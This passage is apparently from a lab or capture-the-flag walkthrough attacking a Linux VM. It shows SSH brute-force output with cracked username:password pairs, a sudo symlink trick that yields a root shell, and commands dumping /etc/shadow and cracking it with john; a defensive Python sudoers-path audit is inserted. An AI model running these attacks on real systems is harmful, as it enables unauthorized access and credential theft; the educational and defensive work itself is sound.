[+] 192.168.1.120:22 SSH - Success: 'krenfro:master' 'uid=1048(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 28 opened (192.168.1.130:51770 -> 192.168.1.120:22) at 2015-01-08 12:30:24 -0700
[+] 192.168.1.120:22 SSH - Success: 'ktso:1234' 'uid=1005(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 29 opened (192.168.1.130:41473 -> 192.168.1.120:22) at 2015-01-08 12:30:27 -0700
[+] 192.168.1.120:22 SSH - Success: 'kwebber:dragon' 'uid=1016(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 30 opened (192.168.1.130:38814 -> 192.168.1.120:22) at 2015-01-08 12:30:30 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmartinez:pepper' 'uid=1034(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 31 opened (192.168.1.130:51877 -> 192.168.1.120:22) at 2015-01-08 12:30:34 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmorales:football' 'uid=1028(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 32 opened (192.168.1.130:54770 -> 192.168.1.120:22) at 2015-01-08 12:30:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'mbryan:jennifer' 'uid=1042(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 33 opened (192.168.1.130:45205 -> 192.168.1.120:22) at 2015-01-08 12:30:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'mholland:jordan' 'uid=1041(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 34 opened (192.168.1.130:38046 -> 192.168.1.120:22) at 2015-01-08 12:30:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'mnader:welcome' 'uid=1047(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 35 opened (192.168.1.130:60899 -> 192.168.1.120:22) at 2015-01-08 12:30:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'mrodriguez:qwerty' 'uid=1026(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 36 opened (192.168.1.130:51135 -> 192.168.1.120:22) at 2015-01-08 12:30:50 -0700
[+] 192.168.1.120:22 SSH - Success: 'qpowers:michael' 'uid=1001(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 37 opened (192.168.1.130:35915 -> 192.168.1.120:22) at 2015-01-08 12:30:53 -0700
[+] 192.168.1.120:22 SSH - Success: 'rdominguez:12345' 'uid=1010(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 38 opened (192.168.1.130:53430 -> 192.168.1.120:22) at 2015-01-08 12:30:56 -0700
[+] 192.168.1.120:22 SSH - Success: 'rjacobson:111111' 'uid=1043(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 39 opened (192.168.1.130:34041 -> 192.168.1.120:22) at 2015-01-08 12:31:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'rpatel:1234567' 'uid=1045(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 40 opened (192.168.1.130:34844 -> 192.168.1.120:22) at 2015-01-08 12:31:03 -0700
[+] 192.168.1.120:22 SSH - Success: 'sgains:computer' 'uid=1019(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 41 opened (192.168.1.130:54407 -> 192.168.1.120:22) at 2015-01-08 12:31:06 -0700
[+] 192.168.1.120:22 SSH - Success: 'sjohnson:12345678' 'uid=1046(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 42 opened (192.168.1.130:40759 -> 192.168.1.120:22) at 2015-01-08 12:31:09 -0700
[+] 192.168.1.120:22 SSH - Success: 'strammel:monkey' 'uid=1006(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 43 opened (192.168.1.130:55731 -> 192.168.1.120:22) at 2015-01-08 12:31:12 -0700
[+] 192.168.1.120:22 SSH - Success: 'swarren:Password' 'uid=1007(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 44 opened (192.168.1.130:52038 -> 192.168.1.120:22) at 2015-01-08 12:31:16 -0700
[+] 192.168.1.120:22 SSH - Success: 'tdeleon:soccer' 'uid=1038(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 45 opened (192.168.1.130:48251 -> 192.168.1.120:22) at 2015-01-08 12:31:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'tgoodchap:nintendo' 'uid=1030(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 46 opened (192.168.1.130:36430 -> 192.168.1.120:22) at 2015-01-08 12:31:22 -0700
[-] 192.168.1.120:22 SSH - Failed: ':'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
I haven’t cracked root yet, but notice this: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin)'. The 102 admin group ID is promising.
Linux 2.6.27.27.
ccoffee@slax:~$ ls
DONOTFORGET* scripts/
ccoffee@slax:~$ cat DONOTFORGET
remember your 20th anniversary on the 5th!!!!!!!!!1111!!
ccoffee@slax:~$ cd scripts/
ccoffee@slax:~/scripts$ ls
getlogs.sh*
ccoffee@slax:~/scripts$ cat getlogs.sh
cat: getlogs.sh: Permission denied
ccoffee@slax:~/scripts$
Permission denied!
ccoffee@slax:~$ mv scripts/ scripts.old
ccoffee@slax:~$ mkdir scripts
ccoffee@slax:~$ ln -s /bin/sh scripts/getlogs.sh
ccoffee@slax:~$ ls -l scripts/getlogs.sh
lrwxrwxrwx 1 ccoffee users 7 Jan 7 23:03 scripts/getlogs.sh -> /bin/sh*
ccoffee@slax:~$ sudo scripts/getlogs.sh
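What this did was rename the old scripts folder, whose script I didn’t have permission to read, to scripts.old. The new scripts/getlogs.sh is a symlink to /bin/sh, so running sudo scripts/getlogs.sh starts a root shell. It works because sudo is evidently allowed for that path, and the path sits inside a home directory that ccoffee can rearrange.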
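From the defender's side, the weakness above is a sudo rule that names a path inside a directory the unprivileged user controls. The audit below is an added example, not part of the original walkthrough: the sudoers line, the function names and the temporary directory tree are constructed assumptions, since the page does not show the real sudoers entry.

```python
import os
import re
import stat
import tempfile

# Matches the command in one sudoers Cmnd_Spec, skipping "(runas)" and "TAG:" prefixes.
CMD = re.compile(r"^\s*(?:\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*(/\S+)")

def sudoers_commands(text):
    """Return absolute command paths granted by simple sudoers rules."""
    paths = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]            # drop comments
        if "=" not in line:
            continue
        for spec in line.split("=", 1)[1].split(","):
            m = CMD.match(spec)
            if m:
                paths.append(m.group(1))
    return paths

def path_findings(cmd, trusted_uids=(0,), root="/"):
    """List (path, reason) for every component of cmd an untrusted user controls."""
    findings = []
    cur = os.path.abspath(root)
    rel = os.path.relpath(os.path.abspath(cmd), cur)
    for part in [""] + rel.split(os.sep):
        cur = os.path.join(cur, part) if part else cur
        st = os.lstat(cur)                      # lstat: judge a final symlink itself
        if st.st_uid not in trusted_uids:
            findings.append((cur, "owned by untrusted uid %d" % st.st_uid))
        elif not stat.S_ISLNK(st.st_mode) and st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((cur, "group- or world-writable"))
    return findings

def demo(script_owner_is_trusted):
    """Build a constructed home/ccoffee/scripts tree and audit the sudoers path."""
    base = tempfile.mkdtemp()
    home = os.path.join(base, "home", "ccoffee")
    os.makedirs(os.path.join(home, "scripts"))
    script = os.path.join(home, "scripts", "getlogs.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\n")
    for p in (home, os.path.dirname(script), script):
        os.chmod(p, 0o755)
    # Constructed rule; the current user stands in for ccoffee when untrusted.
    rule = "ccoffee ALL=(root) NOPASSWD: %s\n" % script
    me = os.getuid()
    trusted = (me,) if script_owner_is_trusted else (me + 1,)
    return [path_findings(c, trusted, root=home) for c in sudoers_commands(rule)]
```

Any finding on a sudo-granted path means the command belongs in a root-owned location such as /usr/local/sbin, with every parent directory owned by root and not group- or world-writable.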
There is no specific challenge so once you are on the system look around and be awesome.
root@slax:/etc# cat passwd
root@slax:/etc# cat shadow
unshadow 120passwd 120shadow > 120unshadow
john -rules -wordlist=/usr/share/wordlists/rockyou.txt 120unshadow